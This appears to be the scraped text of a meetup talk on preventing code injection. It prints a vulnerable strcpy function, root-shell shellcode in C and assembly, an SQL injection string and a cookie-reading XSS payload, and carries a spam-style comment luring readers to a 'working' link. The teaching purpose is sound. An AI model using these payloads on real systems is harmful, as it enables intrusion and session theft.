null Pune meet - Application Security: Code injection


Published on

null Pune meet - Application Security: Code injection – By Aseem Jakhar

Published in: Technology
1 Comment
  • The            setup            in            the            video            no            longer            works.           
    And            all            other            links            in            comment            are            fake            too.           
    But            luckily,            we            found            a            working            one            here (copy paste link in browser) :  
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

null Pune meet - Application Security: Code injection

  1. 1. Application Security: Understanding and Preventing Code injection <ul><ul><li>By </li></ul></ul><ul><ul><li>Aseem Jakhar </li></ul></ul>
  2. 2. About me <ul><li>Open source and security phreak. </li></ul><ul><li>LinkedIn </li></ul><ul><li> </li></ul>
  3. 3. Agenda <ul><li>What is code injection </li></ul><ul><li>Common Code Injection Techniques </li></ul><ul><ul><li>Buffer overflow </li></ul></ul><ul><ul><li>Sql Injection </li></ul></ul><ul><ul><li>Cross site scripting (XSS) </li></ul></ul>
  4. 4. What is code injection ? <ul><li>Every program interfaces with the outer world. </li></ul><ul><li>Input and Output. </li></ul><ul><li>Invalid data. </li></ul><ul><li>Injecting code instead of data and executing it as part of the program. </li></ul>
  5. 5. Buffer overflow <ul><li>input length. </li></ul><ul><li>buffer overflows and overwrites the stack </li></ul><ul><li>Return address overwritten </li></ul><ul><li>Return address can be invalid or point back to user input. </li></ul>
  6. 6. Function call <ul><li>void foo(int a, int b, ….., int n) </li></ul><ul><li>Stack growing towards low memory. </li></ul><ul><li>Caller: </li></ul><ul><li> push arg n </li></ul><ul><li> ... </li></ul><ul><li> push arg b </li></ul><ul><li> push arg a </li></ul><ul><li>push return address # eip </li></ul><ul><li>foo: </li></ul><ul><li> push ebp </li></ul><ul><li>(mov esp, ebp) # ebp </li></ul><ul><li> sub $0x08, esp # Local variables </li></ul>
  7. 7. How does the stack look ?
  8. 9. Example Vulnerable Code <ul><li>int vul_func(char * src) </li></ul><ul><li>{ </li></ul><ul><li>char vul_buf[40] = {0}; </li></ul><ul><li>… </li></ul><ul><li>strcpy(vul_buf, src); </li></ul><ul><li>… </li></ul><ul><li>return 0; </li></ul><ul><li>} </li></ul>
  9. 10. Exploiting buffer overflow <ul><li>Feed the Application, check the registers, return address, shellcode offset/start. </li></ul><ul><li>Create the Shellcode with stable return address. </li></ul><ul><li>Test it. </li></ul><ul><li>Binary pwned!!! </li></ul>
  10. 11. Feed the application <ul><li>$perl –e “print ‘A’ x 1000” </li></ul><ul><li>$echo –en “AAAAAAAAAAAAAAAAAA” </li></ul><ul><li>Pass the string to the application. </li></ul><ul><li>Analyze the core dump, check for eip and other registers for 0x41414141 </li></ul><ul><li>Find the length, offset and valid return address for our shellcode. </li></ul>
  11. 12. Example Shellcode: C <ul><li>setuid(0); </li></ul><ul><li>execve(“/bin/sh”, NULL, NULL); </li></ul><ul><li>$gcc -static -o shell shell.c </li></ul><ul><li>$objdump --disassemble shell </li></ul>
  12. 13. Example Shellcode: Assembly <ul><li>mov $0xd5,%al # syscall no. for setuid </li></ul><ul><li>xor %ebx,%ebx # zero out ebx (pass 0 to setuid) </li></ul><ul><li>int $0x80 # software interrupt </li></ul><ul><li>xor %eax,%eax # Zero out eax </li></ul><ul><li>mov $11,%al # syscall no. execve() store it in eax </li></ul><ul><li>xor %ebx,%ebx # Zero out the contents </li></ul><ul><li>push %ebx # Push it's value(zero: simple hack to avoid 0s, </li></ul><ul><li>push $0x68732f2f # push the string(2nd half) </li></ul><ul><li>push $0x6e69622f # push the string(1st half) STRING == /bin/sh </li></ul><ul><li>mov %esp,%ebx # 1st argument to execve() adress of 1st char in string </li></ul><ul><li>xor %ecx,%ecx # 2nd argument to execve() argv = NULL </li></ul><ul><li>xor %edx,%edx # 3rd argument to execve() envp = NULL </li></ul><ul><li>int $0x80 </li></ul><ul><li>$as –o shell.o shell.s && ld –o shell shell.o </li></ul><ul><li>$objdump –disassemble shell </li></ul>
  13. 14. Demo
  14. 15. Sql Injection <ul><li>Application sends user input to DB. </li></ul><ul><li>An SQL query is generated by adding user input directly to a string. </li></ul><ul><li>Select field from table where value = '$input'; </li></ul><ul><li>Works perfect for valid input :-) </li></ul>
  15. 16. Sql Injection <ul><li>Input meet Bad data! </li></ul><ul><li>What if $input = foo' or 'a'='a </li></ul><ul><li>Select field from table where value = 'foo' or 'a'='a'; </li></ul><ul><li>Voila!!!! </li></ul><ul><li>Unauthorized access, manipulate DB, delete Tables, input wrong details. </li></ul>
  16. 17. Sql Injection
  17. 18. XSS <ul><li>Injecting script code. </li></ul><ul><li>Non-persistent XSS </li></ul><ul><ul><li>Server reads and reflects the content back </li></ul></ul><ul><ul><li><script-code> </li></ul></ul><ul><li>Persistent XSS </li></ul><ul><ul><li>injected into the Web app. </li></ul></ul><ul><li><script>alert(document.cookie)</script> </li></ul>
  18. 19. Conclusion <ul><li>Never ever trust user input. </li></ul><ul><li>Never ever trust user input. </li></ul><ul><li>Never ever trust user input. </li></ul><ul><li>Never ever trust user input. </li></ul><ul><li>Never ever trust user input. </li></ul><ul><li>Never ever trust user input. </li></ul>
  19. 20. Thank You ! Q A? NULL is looking for phreaks Contact: